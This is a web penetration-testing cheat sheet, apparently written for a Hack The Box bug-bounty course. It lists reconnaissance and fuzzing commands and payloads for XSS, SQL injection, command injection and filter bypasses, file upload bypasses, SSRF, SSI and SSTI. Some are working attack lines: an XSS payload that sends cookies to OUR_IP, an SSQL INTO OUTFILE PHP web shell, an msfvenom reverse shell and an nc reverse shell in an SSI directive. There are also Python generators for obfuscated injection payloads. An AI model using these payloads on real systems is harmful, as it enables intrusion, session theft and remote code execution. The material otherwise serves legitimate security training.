CBBH

https://github.com/missteek/cpts-quick-references

Web Requests

cURL

Command

Description

curl -s -O inlanefreight.com/index.html

Download file

curl -k https://inlanefreight.com

Skip HTTPS (SSL) certificate validation

curl inlanefreight.com -v

Print full HTTP request/response details

curl -I https://www.inlanefreight.com

Send HEAD request (only prints response headers)

curl -i https://www.inlanefreight.com

Print response headers and response body

curl https://www.inlanefreight.com -A 'Mozilla/5.0'

Set User-Agent header

curl -u admin:admin http://<SERVER_IP>:<PORT>/

Set HTTP basic authorization credentials

curl http://admin:admin@<SERVER_IP>:<PORT>/

Pass HTTP basic authorization credentials in the URL

curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/

Set request header

curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'

Pass GET parameters

curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/

Send POST request with POST data

curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/

Set request cookies

curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php

Send POST request with JSON data

APIs

Command

Description

curl http://<SERVER_IP>:<PORT>/api.php/city/london

Read entry

curl -s http://<SERVER_IP>:<PORT>/api.php/city/ | jq

Read all entries

curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'

Create (add) entry

curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'

Update (modify) entry

curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City

Delete entry

Information Gathering

WHOIS

Command
Description

nslookup <target>

Identify A record for the target domain.

export TARGET="domain.tld"

Assign target to an environment variable.

whois $TARGET

WHOIS lookup for the target.

DNS Enumeration

Command
Description

nslookup $TARGET

Identify the A record for the target domain.

nslookup -query=A $TARGET

Identify the A record for the target domain.

dig <TARGET> @<nameserver/IP>

Identify the A record for the target domain.

dig a $TARGET @<nameserver/IP>

Identify the A record for the target domain.

nslookup -query=PTR <IP>

Identify the PTR record for the target IP address.

dig -x <IP> @<nameserver/IP>

Identify the PTR record for the target IP address.

nslookup -query=ANY $TARGET

Identify ANY records for the target domain.

dig any $TARGET @<nameserver/IP>

Identify ANY records for the target domain.

nslookup -query=TXT $TARGET

Identify the TXT records for the target domain.

dig txt $TARGET @<nameserver/IP>

Identify the TXT records for the target domain.

nslookup -query=MX $TARGET

Identify the MX records for the target domain.

dig mx $TARGET @<nameserver/IP>

Identify the MX records for the target domain.

Passive Subdomain Enumeration

Resource/Command
Description

curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' | sort -u

All subdomains for a given domain.

curl -s https://sonar.omnisint.io/tlds/{domain} | jq -r '.[]' | sort -u

All TLDs found for a given domain.

curl -s https://sonar.omnisint.io/all/{domain} | jq -r '.[]' | sort -u

All results across all TLDs for a given domain.

curl -s https://sonar.omnisint.io/reverse/{ip} | jq -r '.[]' | sort -u

Reverse DNS lookup on IP address.

curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} | jq -r '.[]' | sort -u

Reverse DNS lookup of a CIDR range.

curl -s "https://crt.sh/?q=${TARGET}&output=json" | jq -r '.[] | "\(.name_value)\n\(.common_name)"' | sort -u

Certificate Transparency.

cat sources.txt | while read source; do theHarvester -d "${TARGET}" -b "$source" -f "${source}-${TARGET}"; done

Searching for subdomains and other information on each of the data sources listed in sources.txt (one theHarvester run per source).

curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

This command fetches JSON-formatted data from crt.sh for example.com (the % is a wildcard), extracts domain names using jq, removes any wildcard prefixes (*.) with sed, and finally sorts and deduplicates the results.
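The jq/sed pipeline above has one blind spot: crt.sh puts every SAN of a certificate into `name_value` joined with newlines, so `.[].name_value` emits multi-line strings and `sort -u` keeps the joined blob as a single entry. The following Python version, added here as an example (not part of the original cheat sheet), splits those values, strips wildcard prefixes, lowercases and de-duplicates, and drops look-alike names such as `example.com.evil.test`. The JSON sample is constructed to look like a crt.sh reply and is not real certificate data.

```python
import json
import re

# Constructed stand-in for a crt.sh reply (not real certificate data)
SAMPLE_CRTSH_JSON = json.dumps([
    {"common_name": "www.example.com", "name_value": "www.example.com\nexample.com"},
    {"common_name": "*.example.com", "name_value": "*.example.com\nexample.com"},
    {"common_name": "dev.example.com", "name_value": "dev.example.com"},
    {"common_name": "MAIL.Example.com", "name_value": "MAIL.Example.com"},
    {"common_name": "example.com.evil.test", "name_value": "example.com.evil.test"},
])


def extract_names(crtsh_json, domain):
    """Return sorted, unique host names under `domain` from a crt.sh JSON reply.

    crt.sh stores all SANs of one certificate in `name_value`, separated by
    newlines, so the value is split before de-duplication.  Wildcard prefixes
    are removed (the sed step of the shell pipeline) and names are lowercased
    so case variants collapse into a single entry.
    """
    names = set()
    for entry in json.loads(crtsh_json):
        candidates = entry.get("name_value", "").split("\n")
        candidates.append(entry.get("common_name", ""))
        for raw in candidates:
            host = re.sub(r"^\*\.", "", raw.strip().lower())
            # keep only the domain itself or real subdomains of it
            if host == domain or host.endswith("." + domain):
                names.add(host)
    return sorted(names)


if __name__ == "__main__":
    # Live use: curl -s "https://crt.sh/?q=%25.example.com&output=json" -o crtsh.json
    # and pass open("crtsh.json").read() in place of the sample.
    for host in extract_names(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
```

Feed the printed list straight into the DNS brute-force or vhost steps below; names that do not resolve are still worth keeping for virtual-host fuzzing.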

Passive Infrastructure Identification

Resource/Command
Description

waybackurls -dates https://$TARGET > waybackurls.txt

Crawling URLs from a domain with the date it was obtained.

Active Infrastructure Identification

Resource/Command
Description

curl -I "http://${TARGET}"

Display HTTP headers of the target webserver.

whatweb -a https://www.facebook.com -v

Technology identification.

wafw00f -v https://$TARGET

WAF Fingerprinting.

cat subdomain.list | aquatone -out ./aquatone -screenshot-timeout 1000

Makes screenshots of all subdomains in subdomain.list.

Active Subdomain Enumeration

Resource/Command
Description

nslookup -query=AXFR $TARGET nameserver.target.domain

Zone Transfer using Nslookup against the target domain and its nameserver.

gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"

Bruteforcing subdomains.

Virtual Hosts

Resource/Command
Description

curl -s http://192.168.10.10 -H "Host: randomtarget.com"

Changing the HOST HTTP header to request a specific domain.

cat ./vhosts.list | while read vhost;do echo -e "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" | grep "Content-Length: ";done

Bruteforcing for possible virtual hosts on the target domain.

ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612

Bruteforcing for possible virtual hosts on the target domain using ffuf.

gobuster vhost -u http://target.domain -w hostnames.txt --append-domain

Bruteforcing for possible virtual hosts on the target domain using gobuster (recent gobuster versions need --append-domain to send word.target.domain rather than the bare word as the Host header).

Crawling

Resource/Command
Description

ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

Discovering files and folders that cannot be spotted by browsing the website.

ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS

Mutated bruteforcing against the target web server.

Here's a basic Scrapy spider example to extract links from example.com. Links ending in one of the extensions listed in interesting_extensions are recorded as findings; every other internal link is followed recursively:

import scrapy

class ExampleSpider(scrapy.Spider):
    name = "example"
    start_urls = ['http://example.com/']
    # file extensions worth reporting instead of crawling into (extend as needed)
    interesting_extensions = ['.pdf', '.doc', '.docx', '.xls', '.xlsx', '.txt', '.zip', '.bak', '.sql']

    def parse(self, response):
        for link in response.css('a::attr(href)').getall():
            if any(link.lower().endswith(ext) for ext in self.interesting_extensions):
                # record the absolute URL of the interesting file
                yield {"file": response.urljoin(link)}
            elif not link.startswith("#") and not link.startswith("mailto:"):
                # follow everything else and parse it with the same callback
                yield response.follow(link, callback=self.parse)

Run it with scrapy runspider example_spider.py -o example_data.json, then list the unique files it found:

jq -r '.[] | select(.file != null) | .file' example_data.json | sort -u

Attacking Web Applications with Ffuf

Command

Description

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ

Directory Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ

Extension Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php

Page Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v

Recursive Fuzzing

ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/

Subdomain Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx

VHost Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx

Parameter Fuzzing

ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

Parameter Fuzzing

ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

Value Fuzzing

Wordlists

Command

Description

/opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

Directory Wordlist

/opt/useful/seclists/Discovery/Web-Content/web-extensions.txt

Extensions Wordlist

/opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Domain Wordlist

/opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt

Parameters Wordlist

Misc

Command

Description

sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'

Add a static hosts-file entry so academy.htb resolves to SERVER_IP without DNS

for i in $(seq 1 1000); do echo $i >> ids.txt; done

Create Sequence Wordlist

JavaScript Deobfuscation

Website

Description

Minify JS code

Cross-Site Scripting (XSS)

Code
Description

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script>document.body.style.background = "#141d2b"</script>

Change Background Color

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change Background Image

<script>document.title = 'HackTheBox Academy'</script>

Change Website Title

<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>

Overwrite website's main body

<script>document.getElementById('urlform').remove();</script>

Remove certain HTML element

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us

python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

Run xsstrike on a url parameter

SQL Injection

MySQL

Command

Description

General

mysql -u root -h docker.hackthebox.eu -P 3306 -p

login to mysql database

SHOW DATABASES

List available databases

USE users

Switch to database

Tables

CREATE TABLE logins (id INT, ...)

Add a new table

SHOW TABLES

List available tables in current database

DESCRIBE logins

Show table properties and columns

INSERT INTO table_name VALUES (value_1,..)

Add values to table

INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)

Add values to specific columns in a table

UPDATE table_name SET column1=newvalue1, ... WHERE <condition>

Update table values

Columns

SELECT * FROM table_name

Show all columns in a table

SELECT column1, column2 FROM table_name

Show specific columns in a table

DROP TABLE logins

Delete a table

ALTER TABLE logins ADD newColumn INT

Add new column

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn

Rename column

ALTER TABLE logins MODIFY oldColumn DATE

Change column datatype

ALTER TABLE logins DROP oldColumn

Delete column

Output

SELECT * FROM logins ORDER BY column_1

Sort by column

SELECT * FROM logins ORDER BY column_1 DESC

Sort by column in descending order

SELECT * FROM logins ORDER BY column_1 DESC, id ASC

Sort by two-columns

SELECT * FROM logins LIMIT 2

Only show first two results

SELECT * FROM logins LIMIT 1, 2

Show two results starting at offset 1, i.e. the second and third rows (the offset is zero-based)

SELECT * FROM table_name WHERE <condition>

List results that meet a condition

SELECT * FROM logins WHERE username LIKE 'admin%'

List results where the name is similar to a given string

MySQL Operator Precedence

  • Division (/), Multiplication (*), and Modulus (%)

  • Addition (+) and Subtraction (-)

  • Comparison (=, >, <, <=, >=, !=, LIKE)

  • NOT (!)

  • AND (&&)

  • OR (||)

SQL Injection

Payload

Description

Auth Bypass

admin' or '1'='1

Basic Auth Bypass

admin')-- -

Basic Auth Bypass With comments

Union Injection

' order by 1-- -

Detect number of columns using order by

cn' UNION select 1,2,3-- -

Detect number of columns using Union injection

cn' UNION select 1,@@version,3,4-- -

Basic Union injection

UNION select username, 2, 3, 4 from passwords-- -

Union injection for 4 columns
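The auth-bypass and UNION rows above, together with the operator-precedence list, are easier to reason about against a database you can run locally. The example below is added here and is not part of the original cheat sheet; it builds an in-memory SQLite database with constructed tables and rows, exposes the two classic injectable queries (string-built login and search), and shows the `' order by N-- -` column-count probe and a UNION dump. SQLite has no `@@version`, so `sqlite_version()` stands in for it.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the 'logins' app; schema and rows are constructed for the demo."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE logins (id INTEGER, username TEXT, password TEXT, date_of_joining TEXT);
        INSERT INTO logins VALUES (1, 'admin', 'p@ssw0rd', '2020-07-02');
        INSERT INTO logins VALUES (2, 'john', 'john123!', '2020-07-03');
        CREATE TABLE credentials (username TEXT, password TEXT);
        INSERT INTO credentials VALUES ('dev_admin', 'devpass');
    """)
    return db


def vulnerable_login(db, username, password):
    """String-built query: the injectable form the Auth Bypass payloads target."""
    sql = "SELECT * FROM logins WHERE username='%s' AND password='%s'" % (username, password)
    return db.execute(sql).fetchall()


def safe_login(db, username, password):
    """Parameterised query: the same input is bound as data and never becomes SQL."""
    sql = "SELECT * FROM logins WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()


def vulnerable_search(db, term):
    """Search that reflects four columns: the UNION injection target."""
    sql = ("SELECT id, username, password, date_of_joining FROM logins "
           "WHERE username LIKE '%s%%'" % term)
    return db.execute(sql).fetchall()


def count_columns(db, max_cols=10):
    """' order by N-- -: walk N upward; the first N that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(db, "' order by %d-- -" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def fingerprint(db):
    """cn' UNION select 1,<version>,3,4-- - with the column count found above."""
    rows = vulnerable_search(db, "cn' UNION SELECT 1, sqlite_version(), 3, 4-- -")
    return rows[0][1]


def union_dump(db):
    """Pull another table through the search using the four-column slot."""
    rows = vulnerable_search(db, "cn' UNION SELECT 1, username, password, 4 FROM credentials-- -")
    return [(r[1], r[2]) for r in rows]


if __name__ == "__main__":
    db = make_db()
    # AND binds tighter than OR: username='admin' OR ('1'='1' AND password='wrong') -> admin row
    print("bypass:", vulnerable_login(db, "admin' or '1'='1", "wrong"))
    # with an empty username the same payload yields nothing, because the OR branch
    # is ('1'='1' AND password='wrong'); the comment form admin'-- - avoids that trap
    print("no user:", vulnerable_login(db, "' or '1'='1", "wrong"))
    print("safe:", safe_login(db, "admin' or '1'='1", "wrong"))
    print("columns:", count_columns(db), "version:", fingerprint(db))
    print("dump:", union_dump(db))
```

The precedence behaviour printed by the first two calls is the practical reason the cheat sheet lists `admin' or '1'='1` with a real username in front and `admin')-- -` as the comment-based variant.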

DB Enumeration

SELECT @@version

Fingerprint MySQL with query output

SELECT SLEEP(5)

Fingerprint MySQL with no output

cn' UNION select 1,database(),2,3-- -

Current database name

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

List all databases

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

List all tables in a specific database

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

List all columns in a specific table

cn' UNION select 1, username, password, 4 from dev.credentials-- -

Dump data from a table in another database

Privileges

cn' UNION SELECT 1, user(), 3, 4-- -

Find current user

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

Find if user has admin privileges

cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

List all privileges granted to a specific user

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Find which directories can be accessed through MySQL

File Injection

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Read local file

select 'file written successfully!' into outfile '/var/www/html/proof.txt'

Write a string to a local file

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Write a web shell into the base web directory

SQLMap

Command

Description

sqlmap -hh

View the advanced help menu

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Run SQLMap without asking for user input

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

SQLMap with POST request

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

POST request specifying an injection point with an asterisk

sqlmap -r req.txt

Passing an HTTP request file to SQLMap

sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

Specifying a cookie header

sqlmap -u www.target.com --data='id=1' --method PUT

Specifying a PUT request

sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt

Store traffic to an output file

sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch

Specify verbosity level

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Specifying a prefix or suffix

sqlmap -u www.example.com/?id=1 -v 3 --level=5

Specifying the level and risk

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Basic DB enumeration

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

Table enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

Table/row enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Conditional enumeration

sqlmap -u "http://www.example.com/?id=1" --schema

Database schema enumeration

sqlmap -u "http://www.example.com/?id=1" --search -T user

Searching for data

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Password enumeration and cracking

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Anti-CSRF token bypass

sqlmap --list-tampers

List all tamper scripts

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

Check for DBA privileges

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Reading a local file

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

Writing a file

sqlmap -u "http://www.example.com/?id=1" --os-shell

Spawning an OS shell

Command Injections

Injection Operators

Injection Operator   Injection Character   URL-Encoded Character   Executed Command

Semicolon            ;                     %3b                     Both
New Line             \n                    %0a                     Both
Background           &                     %26                     Both (second output generally shown first)
Pipe                 |                     %7c                     Both (only second output is shown)
AND                  &&                    %26%26                  Both (only if first succeeds)
OR                   ||                    %7c%7c                  Second (only if first fails)
Sub-Shell            ``                    %60%60                  Both (Linux-only)
Sub-Shell            $()                   %24%28%29               Both (Linux-only)


Linux

Filtered Character Bypass

Code
Description

printenv

Can be used to view all environment variables

Spaces

%09

Using tabs instead of spaces

${IFS}

Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

{ls,-la}

Commas will be replaced with spaces

Other Characters

${PATH:0:1}

Will be replaced with /

${LS_COLORS:10:1}

Will be replaced with ; (with the default LS_COLORS value; confirm the offset with printenv first)

$(tr '!-}' '"-~'<<<[)

Shift character by one ([ -> \)


Blacklisted Command Bypass

Code
Description

Character Insertion

' or "

Total must be even

$@ or \

Linux only

Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Execute command regardless of cases

$(a="WhOaMi";printf %s "${a,,}")

Another variation of the technique

Reversed Commands

echo 'whoami' | rev

Reverse a string

$(rev<<<'imaohw')

Execute reversed command

Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64

Encode a string with base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Execute b64 encoded string

Windows

Filtered Character Bypass

Code
Description

Get-ChildItem Env:

Can be used to view all environment variables - (PowerShell)

Spaces

%09

Using tabs instead of spaces

%PROGRAMFILES:~10,-5%

Will be replaced with a space - (CMD)

$env:PROGRAMFILES[10]

Will be replaced with a space - (PowerShell)

Other Characters

%HOMEPATH:~0,-17%

Will be replaced with \ - (CMD). The offset depends on the length of the user name in HOMEPATH; check the variable and adjust

$env:HOMEPATH[0]

Will be replaced with \ - (PowerShell)


Blacklisted Command Bypass

Code
Description

Character Insertion

' or "

Total must be even

^

Windows only (CMD)

Case Manipulation

WhoAmi

character with odd cases

Reversed Commands

"whoami"[-1..-20] -join ''

Reverse a string

iex "$('imaohw'[-1..-20] -join '')"

Execute reversed command

Encoded Commands

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

Encode a string with base64

iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Execute b64 encoded string

Separator Characters

List of injection characters and matching URL encoded as wordlist of possible separators:

;
%3b
\n
%0a
&
%26
|
%7c
&&
%26%26
||
%7c%7c
``
%60%60
$()
%24%28%29

Obfuscated Commands

List of commands obfuscated as wordlist to test possible WAF filter bypass:

uname
u'n'a'm'e
${uname}
$(uname)
{uname}
$(rev<<<'emanu')
bash<<<$(base64 -d<<<dW5hbWUgLWE=)
b'a's'h'<<<$('b'a's'e'6'4 -d<<<dW5hbWUgLWE=)
l's'${IFS}${PATH:0:1}${IFS}-a'l'

Trick: Burp Intruder's cluster bomb attack type takes the separator list and the obfuscated command list as two payload sets and tries every combination.
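The separator list and the obfuscated-command list above are meant to be combined, and the cluster-bomb trick is just their cross product. The generator below is added here as an example (not part of the original cheat sheet): it implements the Linux bypasses from this section (quote insertion, `${IFS}` and `${PATH:0:1}`, brace expansion, `rev`, base64) as small transforms, prefixes every separator to every form, and URL-encodes the result so it can be used directly as an ffuf wordlist. It only produces strings and never contacts a target.

```python
import base64
import itertools
from urllib.parse import quote

# Separators from the table above; URL encoding is applied on output
SEPARATORS = [";", "\n", "&", "|", "&&", "||"]


def quote_split(word):
    """Insert single quotes between characters: uname -> u'n'a'm'e (count stays even)."""
    return "'".join(word)


def ifs_spaces(cmd):
    """Spaces via ${IFS} and slashes via ${PATH:0:1}, for filters that block both."""
    return cmd.replace("/", "${PATH:0:1}").replace(" ", "${IFS}")


def reversed_cmd(cmd):
    """Hand the reversed string to rev inside a sub-shell: whoami -> $(rev<<<'imaohw')."""
    return "$(rev<<<'%s')" % cmd[::-1]


def b64_cmd(cmd):
    """Decode a base64 blob and feed it to bash: bash<<<$(base64 -d<<<...)."""
    blob = base64.b64encode(cmd.encode()).decode()
    return "bash<<<$(base64 -d<<<%s)" % blob


def obfuscations(cmd):
    """Every obfuscated form of one command line, plain form first, duplicates removed."""
    prog, _, args = cmd.partition(" ")
    forms = [cmd, "$(%s)" % cmd, quote_split(prog) + (" " + args if args else "")]
    if args:
        forms.append("{%s}" % cmd.replace(" ", ","))   # brace expansion: {uname,-a}
    forms += [ifs_spaces(cmd), reversed_cmd(cmd), b64_cmd(cmd)]
    return list(dict.fromkeys(forms))


def payloads(cmd, separators=SEPARATORS):
    """Cluster-bomb cross product: every separator in front of every obfuscated form."""
    return [sep + form for sep, form in itertools.product(separators, obfuscations(cmd))]


def url_encoded(strings):
    """Percent-encode each payload so newlines, &, | and spaces survive the URL."""
    return [quote(s, safe="") for s in strings]


if __name__ == "__main__":
    # Live use: save the output as cmdi.txt and run
    # ffuf -w cmdi.txt:FUZZ -u 'http://<TARGET>/?ip=127.0.0.1FUZZ' -fs <baseline size>
    for line in url_encoded(payloads("uname -a")):
        print(line)
```

Because every payload starts with a separator, the list is meant to be appended to a known-good value (such as the IP a ping form expects) so the original command still runs and only the appended part is tested.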

File Upload

Character Injection - Before/After Extension to generate list of possible filenames to bypass file upload filters on white or black listings.

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do
        echo "shell$char$ext.jpg" >> filenames_wordlist.txt
        echo "shell$ext$char.jpg" >> filenames_wordlist.txt
        echo "shell.jpg$char$ext" >> filenames_wordlist.txt
        echo "shell.jpg$ext$char" >> filenames_wordlist.txt
    done
done

Web Shells

Web Shell

Description

<?php echo file_get_contents('/etc/passwd'); ?>

Basic PHP File Read

<?php system('hostname'); ?>

Basic PHP Command Execution

<?php system($_REQUEST['cmd']); ?>

Basic PHP Web Shell

<% eval request('cmd') %>

Basic ASP Web Shell

msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

Generate PHP reverse shell

PHP Web Shell

PHP Reverse Shell

Seclists Web Shells

Automated reverse shell

Bypasses

Command

Description

Blacklist Bypass

shell.phtml

Uncommon Extension

shell.pHp

Case Manipulation

List of PHP Extensions

List of ASP Extensions

List of Web Extensions

Whitelist Bypass

shell.jpg.php

Double Extension

shell.php.jpg

Reverse Double Extension

%20, %0a, %00, %0d0a, /, .\, ., …

Character Injection - Before/After Extension

Content/Type Bypass

List of Web Content-Types

List of All Content-Types

List of File Signatures/Magic Bytes

Limited Uploads

Potential Attack

File Types

XSS

HTML, JS, SVG, GIF

XXE/SSRF

XML, SVG, PDF, PPT, DOC

DoS

ZIP, JPG, PNG

Login Brute Forcing

hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [-C FILE] -m MODULE [service://server[:PORT][/OPT]]
medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
medusa -h www.example.com -U users.txt -P passwords.txt -M http -m GET
Command
Description

hydra -C wordlist.txt SERVER_IP -s PORT http-get /

Basic Auth Brute Force

hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /

Basic Auth Brute Force

hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

Login Form Brute Force

hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4

SSH Brute Force

cupp -i

Creating Custom Password Wordlist

sed -ri '/^.{,7}$/d' william.txt

Remove Passwords Shorter Than 8

sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt

Remove Passwords With No Special Chars

sed -ri '/[0-9]+/!d' william.txt

Remove Passwords With No Numbers

./username-anarchy Bill Gates > bill.txt

Generate Usernames List

Server-Side Request Forgery (SSRF)

Protocols

http://127.0.0.1/
file:///etc/passwd
gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin
Command
Description

curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080"

Testing for SSRF vulnerability

curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"

Retrieving a remote file through the target application (HTTP Schema)

curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd"

Retrieving a local file through the target application (File Schema)

for port in {1..65535};do echo $port >> ports.txt;done

Generating a wordlist of possible ports

ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30

Fuzzing for ports on the internal interface

curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"

Interacting with the internal interface on the discovered port

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"

Interacting with the internal application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http://127.0.0.1:1"

Discovering web application listening in on localhost

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"

Modifying the URL to bypass the error message

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -

Requesting to disclose the /proc/self/environ file on the internal application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"

Retrieving a local file through the target application

curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"

Confirming remote code execution on the remote host

SSI Injection

Description
SSI Directive Payload

Print variables

<!--#printenv -->

Change config

<!--#config errmsg="Error!" -->

Print specific variable

<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->

Execute command

<!--#exec cmd="whoami" -->

Date

<!--#echo var="DATE_LOCAL" -->

Include web file

<!--#include virtual="index.html" -->

Reverse Shell

<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo /bin/bash 1>/tmp/foo;rm /tmp/foo" -->

SSTI

Command
Description

${{<%[%'"}}%.

Test String

${7*7}

Spring payload

{{_self.env.display("TEST")}}

Twig payload

{{config.items()}}

